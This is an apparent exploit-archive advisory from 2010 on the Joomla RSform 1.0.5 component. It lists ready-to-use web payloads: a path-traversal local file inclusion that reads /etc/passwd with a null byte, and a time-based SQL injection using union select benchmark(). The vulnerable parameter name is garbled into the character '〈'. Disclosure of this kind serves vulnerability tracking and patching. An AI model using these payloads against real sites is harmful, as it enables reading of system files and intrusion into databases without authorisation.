The Joomla RSform component version 1.0.5 suffers from local file inclusion and remote SQL injection vulnerabilities.
e4c4aa629358df1ff23b64737e6277f8b40f8d4ce961131170d4ec52d07e2562
# Exploit Title: RSform! 1.0.5 (Joomla) Multiple Vulnerabilities
# Date: 06.11.2010
# Author: jdc
# Software Link:
http://extensions.joomla.org/extensions/contacts-and-feedback/forms/2265
# Version: 1.0.5
Local File Include
------------------
?option=com_forme
〈=../../../../../../../../../etc/passwd%00
SQL Injection
-------------
?option=com_forme
〈=-1' union select benchmark(1000000,md5(1)) -- '
NOTE: RSform! Pro is not affected...
6 Nov 2010
jdc